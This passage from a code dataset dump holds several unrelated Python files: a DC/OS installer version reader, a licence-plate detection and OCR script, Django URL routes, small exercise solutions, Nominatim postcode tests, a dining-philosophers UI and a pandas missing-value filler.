This cannot include a\n space.\n workspace_dir: The directory in which large temporary files will be\n created.\n This is equivalent to `dir` in :py:func:`tempfile.mkstemp`.\n keep_extracted: Whether to keep the extracted artifact.\n\n Raises:\n ValueError: A space is in the installer path.\n CalledProcessError: There was an error extracting the given installer.\n \"\"\"\n if ' ' in str(installer):\n message = (\n 'No spaces allowed in path to the installer. '\n 'See https://jira.d2iq.com/browse/DCOS_OSS-4429.'\n )\n raise ValueError(message)\n\n workspace_dir = workspace_dir or Path(gettempdir())\n if not keep_extracted:\n workspace_dir = Path(workspace_dir) / uuid.uuid4().hex\n\n workspace_dir.mkdir(exist_ok=True, parents=True)\n\n # The installer interface is as follows:\n #\n # ```\n # $ bash dcos_generate_config.sh --version\n # Extracting image from this script and loading into docker daemon, this \\\n # step can take a few minutes\n # x dcos-genconf.75af9b2571de95e074-c74aa914537fa9f81b.tar\n # Loaded image: mesosphere/dcos-genconf: \\\n # 75af9b2571de95e074-c74aa914537fa9f81b\n # {\n # \"variant\": \"\",\n # \"version\": \"1.12.0-rc3\"\n # }\n # $ bash dcos_generate_config.sh --version\n # {\n # \"variant\": \"\",\n # \"version\": \"1.12.0-rc3\"\n # }\n # ```\n #\n # Therefore we use the installer twice to eliminate all non-JSON text.\n\n version_args = ['bash', str(installer), '--version']\n\n subprocess.check_output(\n args=version_args,\n cwd=str(workspace_dir),\n stderr=subprocess.PIPE,\n )\n\n result = subprocess.check_output(\n args=version_args,\n cwd=str(workspace_dir),\n stderr=subprocess.PIPE,\n )\n\n version_info = json.loads(result.decode())\n\n version = version_info['version']\n variant = {\n 'ee': DCOSVariant.ENTERPRISE,\n '': DCOSVariant.OSS,\n }[version_info['variant']]\n\n if not keep_extracted:\n shutil.rmtree(path=str(workspace_dir))\n\n return _DCOSInstallerDetails(version=version, variant=variant)\n","repo_name":"dcos/dcos-e2e","sub_path":"src/dcos_e2e_cli/_vendor/dcos_installer_tools/artifact_utils.py","file_name":"artifact_utils.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"36817420292","text":"import os\nimport sys\nimport argparse\nfrom datetime import datetime, date\nfrom pathlib import Path\n\nimport csv\nfrom uuid import uuid1\n\nfrom cv2 import VideoCapture, imread, imwrite, CAP_PROP_FPS, CAP_PROP_FRAME_COUNT\nimport torch\nfrom easyocr import Reader\n\nfrom modules.detection.detect import detect_plate\nfrom modules.recognition.recognize import recognize_text_with_easyocr\n\n######################################\n# ROOT path\n######################################\n\nFILE = Path(__file__).resolve()\nROOT = FILE.parents[0]\nif str(ROOT) not in sys.path:\n sys.path.append(str(ROOT))\nROOT = Path(os.path.relpath(ROOT, Path.cwd()))\n\n######################################\n# Create \"logs\" folders to save images and csv\n######################################\n\nLOGS_FOLDER = \"./logs/\"\nPath(LOGS_FOLDER).mkdir(exist_ok=True)\n\n\ndef get_today_paths():\n today = date.today().strftime(\"%Y-%m-%d\")\n\n folder = Path(f\"{LOGS_FOLDER}/{today}/\")\n folder.mkdir(exist_ok=True)\n\n image_folder_path = folder / f\"licenses {today}\"\n image_folder_path.mkdir(exist_ok=True)\n\n csv_filename = folder / f\"{today}.csv\"\n\n return csv_filename, image_folder_path\n\n\nCSV_PATH, IMAGE_FOLDER_PATH = 
get_today_paths()\n\n\n######################################\n# main()\n######################################\n\nVID_FORMATS = \"mp4\", \"mkv\", \"mpg\", \"mpeg\", \"mov\", \"gif\"\nIMG_FORMATS = (\"bmp\", \"dng\", \"jpeg\", \"jpg\", \"mpo\", \"png\", \"tif\", \"tiff\", \"webp\", \"pfm\")\n\n\ndef save_license_car_plate(plate_crop, plate_text):\n unique_image_name = f\"{uuid1()}.jpg\"\n\n imwrite(os.path.join(IMAGE_FOLDER_PATH, unique_image_name), plate_crop)\n\n with open(CSV_PATH, mode=\"a\", newline=\"\", encoding=\"utf-8\") as csv_file:\n csv_writer = csv.writer(\n csv_file, delimiter=\" \", quotechar='\"', quoting=csv.QUOTE_MINIMAL\n )\n csv_writer.writerow([unique_image_name, plate_text])\n\n\ndef video_pipeline(source, imgsz, model, reader):\n time = datetime.now()\n print(f\"\\n\\t2. Detection and recognition started (image size {imgsz})\\n\")\n\n capture = VideoCapture(source)\n\n fps = capture.get(CAP_PROP_FPS)\n frames = int(capture.get(CAP_PROP_FRAME_COUNT))\n duration = frames / fps\n\n frame_count = 0\n while capture.isOpened():\n ok, frame = capture.read()\n if not ok:\n print(\"Video is full processed\")\n break\n\n time_for_one_frame = datetime.now()\n frame_count += 1\n\n plate_crop = detect_plate(frame, imgsz, model)\n if plate_crop is None:\n print(\n f\"Frame №{frame_count}, {datetime.now() - time_for_one_frame} no detections\"\n )\n continue\n\n plate_text = recognize_text_with_easyocr(plate_crop, reader)\n if plate_text == \"\" or len(plate_text) < 6:\n print(\n f\"Frame №{frame_count}, {datetime.now() - time_for_one_frame} the number wasn't recognized, or car plate is too small\"\n )\n continue\n\n save_license_car_plate(plate_crop, plate_text)\n\n print(\n f'Frame №{frame_count}, {datetime.now() - time_for_one_frame} \"{plate_text}\"'\n )\n print(\n f\"\\n\\tDetection and recognition finished!\\n\\tVideo duration: {duration} seconds\\n\\tElapsed {datetime.now() - time} for car plate detection, recognition and saving\"\n )\n\n\ndef image_pipeline(source, imgsz, model, reader):\n image = imread(source)\n\n plate_crop = detect_plate(image, imgsz, model)\n if plate_crop is None:\n return \"\"\n else:\n return recognize_text_with_easyocr(plate_crop, reader)\n\n\ndef test_pipeline(imgsz, model, reader):\n import json\n\n with open(f\"{ROOT}/test/dataset.json\", \"r\", encoding=\"utf-8\") as labels_file:\n test_labels = json.load(labels_file)[\"labels\"]\n\n all_images = len(test_labels)\n\n right_preditctions = 0\n for label in test_labels:\n label_text = label[\"nums\"][0][\"text\"]\n label_file = f'{ROOT}/test/images/{label[\"file\"]}'\n\n pred_text = image_pipeline(label_file, imgsz, model, reader)\n\n print(f\"{label_text}, {pred_text.upper()}\")\n\n if label_text == pred_text.upper():\n right_preditctions += 1\n\n precision = right_preditctions / all_images\n print(f\"Точность: {precision}\")\n\n return precision\n\n\ndef main(\n source=f\"{ROOT}/data/sample.mp4\",\n weights=f\"{ROOT}/models/y5m_baseline.pt\",\n imgsz=640,\n):\n is_video = Path(source).suffix[1:] in VID_FORMATS\n is_image = Path(source).suffix[1:] in IMG_FORMATS\n is_test = Path(source).exists and (source == \"test\")\n\n if not is_video and not is_image and not is_test:\n print(\n f\"[--source N] Expected VIDEO, IMAGE file or 'test' ('test' folder should exist), but got {source}\"\n )\n return\n\n print(\"\\n\\t1. 
Downloading models ...\\n\")\n\n model = torch.hub.load(\n \"ultralytics/yolov5\", \"custom\", path=weights, trust_repo=True\n )\n\n reader = Reader([\"ru\"])\n\n print(\"\\n\\tDownload - success!\")\n\n if is_video and Path(source).is_file():\n video_pipeline(source, imgsz, model, reader)\n\n if is_image and Path(source).is_file():\n number = image_pipeline(source, imgsz, model, reader)\n print(f'\\n\\t{source} -> license car number: \"{number}\"')\n\n if is_test:\n # python main.py --weights .\\models\\y5s6.pt --source test --img 1280\n test_pipeline(imgsz, model, reader)\n\n # is_url =\n # TODO()\n print(\"\\n\\tExit ...\")\n return \"zxc\"\n\n\ndef parse_opt():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--weights\",\n type=str,\n default=f\"{ROOT}/models/y5m_baseline.pt\",\n help=\"Trained model *.pt\",\n )\n parser.add_argument(\n \"--source\",\n type=str,\n default=f\"{ROOT}/data/sample.mp4\",\n help=\"Source file (video) or link (stream)\",\n )\n parser.add_argument(\n \"--imgsz\",\n \"--imgs\",\n \"--img\",\n \"--img-size\",\n type=int,\n default=640,\n help=\"inference size h,w\",\n )\n opt = parser.parse_args()\n return opt\n\n\nif __name__ == \"__main__\":\n opt = parse_opt()\n main(**vars(opt))\n","repo_name":"azatnv/deep-learning-module","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23331619020","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\nfrom rest_framework.routers import DefaultRouter\n\nfrom users.views import UserViewSet\nfrom tweets.views import TweetViewSet\n\nrouter = DefaultRouter()\nrouter.register(r'users', UserViewSet)\nrouter.register(r'tweets', TweetViewSet)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/v1/', include(router.urls)),\n path('api/v1/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/v1/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('api/v1/users/', include('users.urls')),\n path('api/v1/tweets/', include('tweets.urls')),\n]\n","repo_name":"adensoares/minitwitter-api","sub_path":"minitwitter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23739869558","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . 
import views\n\napp_name='posts'\n\nurlpatterns = [\n path('', views.postList, name=\"postList\"),\n # path('createPost////', views.createPost, name=\"createPost\"),\n path('postCreation/', views.createPost, name=\"postCreation\"),\n path('postUpdate//', views.updatePost, name=\"postUpdate\"),\n path('postDelete//', views.deletePost, name=\"postDelete\"),\n]","repo_name":"Nodiryps/npe_asbl_webApp","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38153812293","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\nimport Config\nimport math\nimport Logger\nimport numpy as np\n\nclass MetricUtil(object):\n \"\"\"docsTry for MetricUtil\"\"\"\n def __init__(self):\n super(MetricUtil, self).__init__()\n self.__logger = Logger.Logger(__name__)\n self.__MINVALUE = -2147483648 # The min value of INT.\n self.__MAXVALUE = 2147483647 # The max value of INT\n\n def get_min_value(self):\n\n return self.__MINVALUE\n\n def get_max_value(self):\n\n return self.__MAXVALUE\n\n def threshold_index(self, index):\n\n if index <= 0:\n return 0\n\n return index - 1\n\n def DynamicThreshold(self, data, percentage = 0.2, multi_fact = 5, is_upper = True):\n '''\n Method: Average_Value + multi_fact * Standard Deviation\n percentage: 去掉高低各该百分比的数据,默认值是20%\n is_upper: True将返回上界阈值,False将返回下界阈值\n '''\n if not is_upper:\n multi_fact = -1 * multi_fact\n\n deleteNumber = int(math.floor(len(data) * percentage))\n deleteNumber = 1 if deleteNumber == 0 else deleteNumber # 避免deleteNumber等于0\n self.__logger.debug(\"DeleteNumber: \" + str(deleteNumber))\n calc_data = data[deleteNumber:-deleteNumber]\n if len(calc_data) != 0:\n result = math.floor(np.mean(calc_data) + multi_fact * np.std(calc_data, ddof=0))\n if np.isnan(result):\n result = self.__MINVALUE if is_upper else self.__MAXVALUE\n else:\n result = self.__MINVALUE if is_upper else self.__MAXVALUE\n\n return result\n\n def calculate_study_threshold(self, data):\n ''''''\n normals = []\n arounds = []\n lows = []\n for key, value in data.items():\n if 'face_pose_normal' in value:\n normals.append(value['face_pose_normal'])\n if 'face_pose_around' in value:\n arounds.append(value['face_pose_around'])\n if 'face_pose_low' in value:\n lows.append(value['face_pose_low'])\n\n normal_len = len(normals)\n thresholds = {}\n if normal_len != 0:\n normals.sort(reverse=True)\n self.__logger.debug(str(normals))\n # 不佳\n thresholds['study_bad'] = normals[self.threshold_index(int(math.floor(normal_len * Config.STUDY_THREHOLD_BAD['FACE_POSE_NORMAL'])))]\n # 非常好\n thresholds['study_great'] = normals[self.threshold_index(int(math.floor(normal_len * Config.STUDY_THREHOLD_GREAT['FACE_POSE_NORMAL'])))]\n # 良好\n thresholds['study_good'] = normals[self.threshold_index(int(math.floor(normal_len * Config.STUDY_THREHOLD_GOOD['FACE_POSE_NORMAL'])))]\n\n arounds_len = len(arounds)\n if arounds_len != 0:\n arounds.sort(reverse=True)\n self.__logger.debug(str(arounds))\n thresholds['study_bad_around'] = arounds[self.threshold_index(int(math.floor(arounds_len * Config.STUDY_THREHOLD_BAD['FACE_POSE_AROUND'])))]\n thresholds['study_bad_around_count'] = self.DynamicThreshold(arounds, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n lows_len = len(lows)\n if lows_len != 0:\n lows.sort(reverse=True)\n self.__logger.debug(str(lows))\n thresholds['study_bad_low'] = lows[self.threshold_index(int(math.floor(lows_len * 
Config.STUDY_THREHOLD_BAD['FACE_POSE_LOW'])))]\n thresholds['study_bad_low_count'] = self.DynamicThreshold(lows, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n self.__logger.debug(\"Study Thresholds: \" + str(thresholds))\n\n return thresholds\n\n def calculate_emotion_threshold(self, data):\n ''''''\n res_happy = []\n res_low = []\n for key, value in data.items():\n if 'emotion_happy' in value:\n res_happy.append(value['emotion_happy'])\n if 'emotion_low' in value:\n res_low.append(value['emotion_low'])\n\n thresholds = {}\n if len(res_low) != 0:\n # 低落\n res_low.sort(reverse=True)\n self.__logger.debug(str(res_low))\n thresholds['emotion_low'] = res_low[self.threshold_index(int(math.floor(len(res_low) * Config.EMOTION_THRESHOLD_LOW['SAD_RATIO'])))]\n thresholds['emotion_low_count'] =self.DynamicThreshold(res_low, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(res_happy) != 0:\n # 开心\n res_happy.sort(reverse=True)\n self.__logger.debug(str(res_happy))\n thresholds['emotion_happy'] = res_happy[self.threshold_index(int(math.floor(len(res_happy) * Config.EMOTION_THRESHOLD_HAPPY['SMILE_RATIO'])))]\n thresholds['emotion_happy_count'] = self.DynamicThreshold(res_happy, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n self.__logger.debug(\"Emotion threshold: \" + str(thresholds))\n return thresholds\n\n def calculate_mental_threshold(self, data):\n body_stat_sttk = []\n body_stat_pztk = []\n body_stat_standup = []\n body_stat_handup = []\n for key, value in data.items():\n if 'body_stat_sttk' in value:\n body_stat_sttk.append(value['body_stat_sttk'])\n if 'body_stat_pztk' in value:\n body_stat_pztk.append(value['body_stat_pztk'])\n if 'body_stat_standup' in value:\n body_stat_standup.append(value['body_stat_standup'])\n if 'body_stat_handup' in value:\n body_stat_handup.append(value['body_stat_handup'])\n\n thresholds = {}\n if len(body_stat_sttk) != 0:\n # 手托头听课\n body_stat_sttk.sort(reverse=True)\n self.__logger.debug(str(body_stat_sttk))\n thresholds['body_stat_sttk_count'] = self.DynamicThreshold(body_stat_sttk, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(body_stat_pztk) != 0:\n # 趴着听课\n body_stat_pztk.sort(reverse=True)\n self.__logger.debug(str(body_stat_pztk))\n thresholds['body_stat_pztk_count'] = self.DynamicThreshold(body_stat_pztk, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(body_stat_standup) != 0:\n # 站立\n body_stat_standup.sort(reverse=True)\n self.__logger.debug(str(body_stat_standup))\n thresholds['body_stat_standup_count'] = self.DynamicThreshold(body_stat_standup, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n if len(body_stat_handup) != 0:\n # 举手\n body_stat_handup.sort(reverse=True)\n self.__logger.debug(str(body_stat_handup))\n thresholds['body_stat_handup_count'] = self.DynamicThreshold(body_stat_handup, Config.DYNAMIC_DELETE_PERCENTAGE, 5, is_upper=True)\n\n self.__logger.debug(\"Emotion threshold: \" + str(thresholds))\n return thresholds\n\n def estimate_study_stat(self, mentals, face_poses, thresholds):\n ''''''\n self.__logger.debug(\"Mentals: \" + str(mentals))\n self.__logger.debug(\"Face_pose: \" + str(face_poses))\n self.__logger.debug(\"Thresholds: \" + str(thresholds))\n\n total = 0.0\n if 'face_pose_normal' in face_poses:\n total += face_poses['face_pose_normal']\n if 'face_pose_around' in face_poses:\n total += face_poses['face_pose_around']\n if 'face_pose_low' in face_poses:\n total += face_poses['face_pose_low']\n\n if ('student_mental_stat' in mentals and 
(mentals['student_mental_stat'] == Config.STUDY_THREHOLD_BAD['MENTAL'])\\\n and 'face_pose_normal' in face_poses and 'study_bad' in thresholds and (face_poses['face_pose_normal'] <= thresholds['study_bad'])) \\\n or ('face_pose_around' in face_poses and 'study_bad_around' in thresholds and (face_poses['face_pose_around'] >= thresholds['study_bad_around']) and (face_poses['face_pose_around'] >= thresholds['study_bad_around_count']) and (face_poses['face_pose_around'] / total >= Config.STUDY_THREHOLD_BAD['FACE_POSE_AROUND_FEQ']))\\\n or ('face_pose_low' in face_poses and 'study_bad_low' in thresholds and (face_poses['face_pose_low'] >= thresholds['study_bad_low']) and (face_poses['face_pose_low'] >= thresholds['study_bad_low_count']) and (face_poses['face_pose_low'] / total >= Config.STUDY_THREHOLD_BAD['FACE_POSE_LOW_FEQ'])): # 学习状态 -- 不佳\n return 3\n elif 'student_mental_stat' in mentals and (mentals['student_mental_stat'] == Config.STUDY_THREHOLD_GREAT['MENTAL'])\\\n and 'face_pose_normal' in face_poses and 'study_great' in thresholds and (face_poses['face_pose_normal'] >= thresholds['study_great']) and (face_poses['face_pose_normal'] / total >= Config.STUDY_THREHOLD_GREAT['FACE_POSE_NORMAL_FEQ']): # 学习状态 -- 非常好\n return 0\n elif 'student_mental_stat' in mentals and (mentals['student_mental_stat'] in Config.STUDY_THREHOLD_GOOD['MENTAL'])\\\n and 'face_pose_normal' in face_poses and 'study_good' in thresholds and (face_poses['face_pose_normal'] >= thresholds['study_good']) and (face_poses['face_pose_normal'] / total >= Config.STUDY_THREHOLD_GOOD['FACE_POSE_NORMAL_FEQ']): # 学习状态 -- 良好\n return 1\n else: # 学习状态 -- 正常\n return 2\n\n def estimate_mental_stat(self, emotions, body_stats, thresholds):\n ''''''\n self.__logger.debug(\"Emotion: \" + str(emotions))\n self.__logger.debug(\"Body_Stat: \" + str(body_stats))\n\n total = 0.0\n mental_tired_cnt = 0.0\n mental_positive_cnt = 0.0\n if 'body_stat_normal' in body_stats:\n total += body_stats['body_stat_normal']\n if 'body_stat_standup' in body_stats:\n total += body_stats['body_stat_standup']\n mental_positive_cnt += body_stats['body_stat_standup']\n if 'body_stat_handup' in body_stats:\n total += body_stats['body_stat_handup']\n mental_positive_cnt += body_stats['body_stat_handup']\n if 'body_stat_sleep' in body_stats:\n total += body_stats['body_stat_sleep']\n if 'body_stat_sttk' in body_stats:\n total += body_stats['body_stat_sttk']\n mental_tired_cnt += body_stats['body_stat_sttk']\n if 'body_stat_pztk' in body_stats:\n total += body_stats['body_stat_pztk']\n mental_tired_cnt += body_stats['body_stat_pztk']\n\n if ('student_emotion' in emotions and emotions['student_emotion'] == Config.MENTAL_THRESHOLD_TIRED['EMOTION_STATUS']) \\\n and (mental_tired_cnt / total >= Config.MENTAL_THRESHOLD_TIRED['BODY_STAT']) and (('body_stat_sttk' in body_stats and body_stats['body_stat_sttk'] >= thresholds['body_stat_sttk_count']) or ('body_stat_pztk' in body_stats and body_stats['body_stat_pztk'] >= thresholds['body_stat_pztk_count'])): # 精神状态 -- 疲惫\n return 2\n elif ('student_emotion' in emotions and emotions['student_emotion'] == Config.MENTAL_THRESHOLD_POSITIVE['EMOTION_STATUS']) \\\n and (mental_positive_cnt / total >= Config.MENTAL_THRESHOLD_POSITIVE['BODY_STAT']) and (('body_stat_standup' in body_stats and body_stats['body_stat_standup'] >= thresholds['body_stat_standup_count']) or ('body_stat_handup' in body_stats and body_stats['body_stat_handup'] >= thresholds['body_stat_handup_count'])): # 精神状态 -- 积极\n return 0\n else: # 正常\n return 1\n\n def 
estimate_emotion(self, emotions, thresholds):\n ''''''\n self.__logger.debug(\"Emotions: \" + str(emotions))\n self.__logger.debug(\"Thresholds: \" + str(thresholds))\n\n total = 0.0\n if 'emotion_low' in emotions:\n total += emotions['emotion_low']\n if 'emotion_happy' in emotions:\n total += emotions['emotion_happy']\n if 'emotion_normal' in emotions:\n total += emotions['emotion_normal']\n\n if 'emotion_low' in emotions and 'emotion_low' in thresholds and (emotions['emotion_low'] / total >= Config.EMOTION_THRESHOLD_LOW['SAD_FREQUENCY']) and (emotions['emotion_low'] >= thresholds['emotion_low']) and (emotions['emotion_low'] >= thresholds['emotion_low_count']): # 情绪 -- 低落\n return 2\n elif 'emotion_happy' in emotions and 'emotion_happy' in thresholds and (emotions['emotion_happy'] / total >= Config.EMOTION_THRESHOLD_HAPPY['SMILE_FREQUENCY']) and (emotions['emotion_happy'] >= thresholds['emotion_happy']) and (emotions['emotion_happy'] >= thresholds['emotion_happy_count']): # 情绪 -- 开心\n return 0\n else: # 情绪 -- 正常\n return 1","repo_name":"stuMental/DataModel","sub_path":"MetricUtil.py","file_name":"MetricUtil.py","file_ext":"py","file_size_in_byte":12752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13290984201","text":"from under100.day65 import test\n\n\n# https://edabit.com/challenge/zqMREZ2MQd9M5jNfM\ndef is_symmetrical(a_num):\n a_str = str(a_num)\n return a_str == a_str[::-1]\n\n\n# https://edabit.com/challenge/9TcXrWEGH3DaCgPBs\ndef find_odd(a_list):\n for i in a_list:\n if a_list.count(i) % 2:\n return i\n\n\ndef test_suite():\n test(is_symmetrical(7227))\n test(not is_symmetrical(12567))\n test(is_symmetrical(44444444))\n test(not is_symmetrical(9939))\n test(is_symmetrical(1112111))\n test(find_odd([1, 1, 2, -2, 5, 2, 4, 4, -1, -2, 5]) == -1)\n test(find_odd([20, 1, 1, 2, 2, 3, 3, 5, 5, 4, 20, 4, 5]) == 5)\n test(find_odd([10]) == 10)\n\n\nif __name__ == '__main__':\n test_suite()\n","repo_name":"markvogel/100days","sub_path":"2019/day127.py","file_name":"day127.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23295653868","text":"\"\"\"\nTests for functions to maintain the artificial postcode table.\n\"\"\"\n\nimport pytest\n\nfrom nominatim.tools import postcodes\n\n@pytest.fixture\ndef postcode_table(temp_db_with_extensions, temp_db_cursor, table_factory,\n placex_table, word_table):\n table_factory('location_postcode',\n \"\"\" place_id BIGINT,\n parent_place_id BIGINT,\n rank_search SMALLINT,\n rank_address SMALLINT,\n indexed_status SMALLINT,\n indexed_date TIMESTAMP,\n country_code varchar(2),\n postcode TEXT,\n geometry GEOMETRY(Geometry, 4326)\"\"\")\n temp_db_cursor.execute('CREATE SEQUENCE seq_place')\n temp_db_cursor.execute(\"\"\"CREATE OR REPLACE FUNCTION getorcreate_postcode_id(postcode TEXT)\n RETURNS INTEGER AS $$ BEGIN RETURN 1; END; $$ LANGUAGE plpgsql;\n \"\"\")\n\n\ndef test_import_postcodes_empty(dsn, temp_db_cursor, postcode_table, tmp_path):\n postcodes.import_postcodes(dsn, tmp_path)\n\n assert temp_db_cursor.table_exists('gb_postcode')\n assert temp_db_cursor.table_exists('us_postcode')\n assert temp_db_cursor.table_rows('location_postcode') == 0\n\n\ndef test_import_postcodes_from_placex(dsn, temp_db_cursor, postcode_table, tmp_path):\n temp_db_cursor.execute(\"\"\"\n INSERT INTO placex (place_id, country_code, address, geometry)\n VALUES (1, 'xx', '\"postcode\"=>\"9486\"', 
'SRID=4326;POINT(10 12)')\n \"\"\")\n\n postcodes.import_postcodes(dsn, tmp_path)\n\n rows = temp_db_cursor.row_set(\"\"\" SELECT postcode, country_code,\n ST_X(geometry), ST_Y(geometry)\n FROM location_postcode\"\"\")\n print(rows)\n assert len(rows) == 1\n assert rows == set((('9486', 'xx', 10, 12), ))\n\n","repo_name":"pepe-invest-git/Nominatim","sub_path":"test/python/test_tools_postcodes.py","file_name":"test_tools_postcodes.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"29534081199","text":"import sys\nimport os\n\n\nuse_emoji = os.environ.get(\"use_emoji\", \"False\") == \"True\"\n\nif not use_emoji:\n face = \" =]\"\n thinking = \"THK\"\n eating = \"EAT\"\n fork_icon = \"Y\"\nelse:\n face = \"😀\"\n thinking = \"🤔\"\n eating = \"😖\"\n fork_icon = \"🍴\"\n\nphilosophers = [\n \"nothing\",\n \"nothing\",\n \"nothing\",\n \"nothing\",\n \"nothing\"\n]\n\nphilosopher_mapping = {\n \"nothing\": face,\n \"eating\": eating,\n \"thinking\": thinking\n}\n\nfork_mapping = {\n True: fork_icon,\n False: \" \"\n}\n\nforks = [\n True,\n True,\n True,\n True,\n True,\n]\n\n\ndef get_table():\n fork_display = [fork_mapping[fork] for fork in forks]\n phi_mapping = [philosopher_mapping[i] for i in philosophers]\n return \" \".join(\" \".join(_) for _ in zip(fork_display, phi_mapping)) + \" \"\n\n\ndef ui(ui_queue):\n while True:\n ui_change = ui_queue.get()\n status_change, index, change = ui_change\n if status_change:\n philosophers[index] = change\n sys.stdout.write(\"\\r\")\n sys.stdout.write(get_table())\n sys.stdout.flush()\n else:\n forks[index] = change\n","repo_name":"andychase/classwork","sub_path":"os2/concurrency_1/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"386376383","text":"\"\"\"\r\n--- Middle value ---\r\nWrite a function, middle_value, that takes in the head of a linked list as an argument. The function should return the value of the middle node in the linked list. 
If the linked list has an even number of nodes, then return the value of the second middle node.\r\n\"\"\"\r\nimport unittest\r\n\r\n\r\nclass Node:\r\n def __init__(self, val):\r\n self.val = val\r\n self.next = None\r\n\r\n\r\ndef middle_value(head: Node):\r\n slow = head\r\n fast = head\r\n\r\n while fast is not None and fast.next is not None:\r\n fast = fast.next.next\r\n slow = slow.next\r\n\r\n return slow.val\r\n\r\n\r\nclass Test(unittest.TestCase):\r\n def test_00(self):\r\n a = Node('a')\r\n b = Node('b')\r\n c = Node('c')\r\n d = Node('d')\r\n e = Node('e')\r\n\r\n a.next = b\r\n b.next = c\r\n c.next = d\r\n d.next = e\r\n\r\n # a -> b -> c -> d -> e\r\n assert middle_value(a) == 'c'\r\n\r\n def test_01(self):\r\n a = Node('a')\r\n b = Node('b')\r\n c = Node('c')\r\n d = Node('d')\r\n e = Node('e')\r\n f = Node('f')\r\n\r\n a.next = b\r\n b.next = c\r\n c.next = d\r\n d.next = e\r\n e.next = f\r\n\r\n # a -> b -> c -> d -> e -> f\r\n assert middle_value(a) == 'd'\r\n\r\n def test_02(self):\r\n x = Node('x')\r\n y = Node('y')\r\n z = Node('z')\r\n\r\n x.next = y\r\n y.next = z\r\n\r\n # x -> y -> z\r\n assert middle_value(x) == 'y'\r\n\r\n def test_03(self):\r\n x = Node('x')\r\n y = Node('y')\r\n\r\n x.next = y\r\n\r\n # x -> y\r\n assert middle_value(x) == 'y'\r\n\r\n def test_04(self):\r\n q = Node('q')\r\n\r\n # q\r\n assert middle_value(q) == 'q'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"siimveske/structy.net","sub_path":"9. Mixed Recall/103_middle_value.py","file_name":"103_middle_value.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40003117282","text":"import sys\nimport pandas as pd\nimport numpy as np\n\nprogram = sys.argv[0]\nnewtable = sys.argv[1]\ntablename = sys.argv[2]\nmode = sys.argv[3]\ntable = pd.read_csv(tablename)\n\ndef handle_nan_zero(df):\n\tdf = df.fillna(0)\n\treturn df\n\t\ndef handle_nan_median(df):\n\tdf = df.fillna(df.median())\n\treturn df\n\t\ndef handle_nan_mean(df):\n\tdf = df.fillna(df.mean())\n\treturn df\n\t\ndef handle_nan_delete(df):\n\tdf = df.dropna()\n\treturn df\n\ndef handle_nan_mode(df):\n\tdf = df.fillna(df.mode().iloc[0]) # .ix was removed from pandas; .iloc[0] keeps the original behavior\n\treturn df\n\t\ndef get_prefix(program):\n\tsplitted = program.split(\"/\")\n\tpy = splitted[len(splitted)-1].split(\".py\");\n\tprefix = py[0]+\"_\"\n\treturn prefix\n\ndef get_newfile_name(tablename):\n\tnewfilename = get_prefix(program)+get_tablename(tablename)\n\treturn newfilename\n\t\ndef get_newfile_path(tablename):\n\tpath = tablename[:len(tablename)-len(get_tablename(tablename))]\n\treturn path\n\t\ndef get_tablename(tablename):\n\tsplitted = tablename.split(\"/\")\n\treturn splitted[len(splitted)-1]\n\t\nnewtablename = get_newfile_path(tablename) + get_newfile_name(tablename)\n\nif mode == \"zero\":\n\ttable_out = handle_nan_zero(table)\nif mode == \"mean\":\n\ttable_out = handle_nan_mean(table)\nif mode == \"median\":\n\ttable_out = handle_nan_median(table)\nif mode == \"del\":\n\ttable_out = handle_nan_delete(table)\nif mode == \"modusz\":\n\ttable_out = handle_nan_mode(table)\n\t\nif newtable == \"true\":\n\ttable_out.to_csv(newtablename, index=False)\nelse:\n\ttable_out.to_csv(tablename, index=False)\n\t\n\n","repo_name":"gyenesada/javaProject","sub_path":"python_codes/nanvalues.py","file_name":"nanvalues.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
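Editor's note: a minimal sketch of the five NaN strategies nanvalues.py selects between, run on a toy DataFrame (hypothetical data, not from the repo):

import numpy as np
import pandas as pd

df = pd.DataFrame({'a': [1.0, np.nan, 3.0], 'b': [np.nan, 2.0, 2.0]})
print(df.fillna(0))                   # mode "zero"
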